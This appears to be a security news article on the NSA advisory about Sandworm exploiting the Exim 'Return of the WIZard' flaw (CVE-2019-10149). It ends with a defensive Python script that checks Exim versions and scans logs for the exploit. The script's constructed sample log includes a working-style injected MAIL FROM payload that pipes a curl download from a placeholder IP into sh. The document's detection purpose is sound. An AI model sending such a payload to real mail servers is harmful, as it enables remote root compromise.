The NSA has warned that Sandworm, a Russian state-backed cyber-espionage group, has been exploiting a flaw in Exim mail servers since at least August 2019. According to the NSA, a successful attack gives the intruder root access and lets them plant backdoors for later use. Although a fix has been available since last year, millions of servers remain exposed.
Millions of Internet Facing Mail Servers
Exim is a free Mail Transfer Agent (MTA) for Unix-like operating systems, used by millions of administrators in both public and private organizations. In June 2019, researchers disclosed a critical vulnerability in Exim, dubbed "The Return of the WIZard" (CVE-2019-10149), that lets a remote attacker execute commands as root on unpatched servers simply by sending a crafted message.
The National Security Agency (NSA) attributes the attacks to the GRU Main Center for Special Technologies (GTsST), military unit 74455, the Russian state-backed group better known as Sandworm, and says it has been exploiting the flaw since at least August 2019, shortly after the public disclosure. Microsoft warned system administrators about the vulnerability in June 2019 and advised them to patch; the fix had already shipped in Exim 4.92, and the public advisory followed on June 5th 2019. Even so, BleepingComputer reports that millions of servers remain exposed.
Consequences and Workarounds
According to the advisory, the attacker sends a maliciously crafted email with a command embedded in the MAIL FROM field of the SMTP exchange. The vulnerable server executes that command as root, and it downloads a shell script from an attacker-controlled domain, which:
- Adds privileged users (controlled by the attackers),
- Updates the SSH configuration to enable additional remote access,
- Disables network security settings, and
- Executes an additional script to enable follow-on exploitation.
The Exim maintainers fixed the flaw in version 4.92, and the NSA urges administrators to update immediately to version 4.93 or later, either through their Linux distribution's package manager or from the Exim website. Read the NSA's advisory for the full list of indicators of compromise and check your servers against them.
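Two checks a responder would want to run on a mail server in light of the above, as an added example that is not part of the article or of the NSA advisory: confirm whether the installed Exim falls in the affected range (4.87 to 4.91 inclusive, fixed in 4.92), and scan the Exim mainlog for the `${run{...}}` string expansion that the vulnerability executes as root. The `exim -bV` output and the log lines below are constructed for this example; the IP addresses and the download URL in them are placeholders, not real indicators.

```python
"""Triage helpers for CVE-2019-10149 ("The Return of the WIZard") in Exim.

Added example, not code from the article or the NSA advisory. It answers:
  1. Is the installed Exim in the affected range (4.87 - 4.91, fixed in 4.92)?
  2. Does the mainlog contain the ${run{...}} expansion in an envelope address?
"""
import re
from typing import List, Optional, Tuple

FIRST_VULNERABLE = (4, 87)  # first release with the vulnerable expansion path
FIXED_IN = (4, 92)          # fixed in 4.92; NSA recommends 4.93 or later
# Note: releases before 4.87 are only exposed if built with EXPERIMENTAL_EVENT,
# which this simple range check does not model.

# Exim string expansion that runs a command: ${run{<cmd> <args>}}.
# A sender or recipient address should never contain it.
RUN_EXPANSION = re.compile(r"\$\{\s*run\s*\{", re.IGNORECASE)


def parse_exim_version(bv_output: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from the first line of `exim -bV` output."""
    m = re.search(r"Exim version (\d+)\.(\d+)", bv_output)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_version(version: Tuple[int, int]) -> bool:
    """True for 4.87 <= version < 4.92; 4.92.x patch releases are safe."""
    return FIRST_VULNERABLE <= version < FIXED_IN


def find_run_expansions(mainlog: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every mainlog line with ${run{."""
    hits = []
    for n, line in enumerate(mainlog.splitlines(), start=1):
        if RUN_EXPANSION.search(line):
            hits.append((n, line))
    return hits


# Constructed sample (not real traffic): an accepted message whose envelope
# sender carries the expansion, a benign message, and a rejected attempt.
SAMPLE_MAINLOG = """\
2019-08-12 10:15:02 1hwvTx-0001Ab-3F <= ${run{/bin/sh -c "curl http://203.0.113.99/x.sh|sh"}}@localhost H=(mail) [203.0.113.5] P=esmtp S=612
2019-08-12 10:16:30 1hwvUV-0001Ac-9Q <= alice@example.com H=(mail.example.com) [198.51.100.7] P=esmtps S=2048
2019-08-12 10:20:11 H=(scan) [203.0.113.5] F=<${run{/usr/bin/id}}@localhost> rejected RCPT <root@localhost>: relay not permitted
"""

# Constructed `exim -bV` first line for a vulnerable build.
SAMPLE_BV = "Exim version 4.91 #1 built 05-Jun-2019"

if __name__ == "__main__":
    ver = parse_exim_version(SAMPLE_BV)
    print("installed:", ver, "vulnerable:", ver is not None and is_vulnerable_version(ver))
    for n, line in find_run_expansions(SAMPLE_MAINLOG):
        print(f"suspicious mainlog line {n}: {line[:90]}")
```

On a live host, feed `parse_exim_version` the output of `exim -bV` and `find_run_expansions` the contents of `/var/log/exim4/mainlog` (Debian) or `/var/log/exim/main.log` (Red Hat). A hit on an accepted message (`<=`) means the expansion reached the vulnerable code, so treat the host as compromised and move on to the NSA's host-based indicators; a version check alone only says whether the server was exploitable.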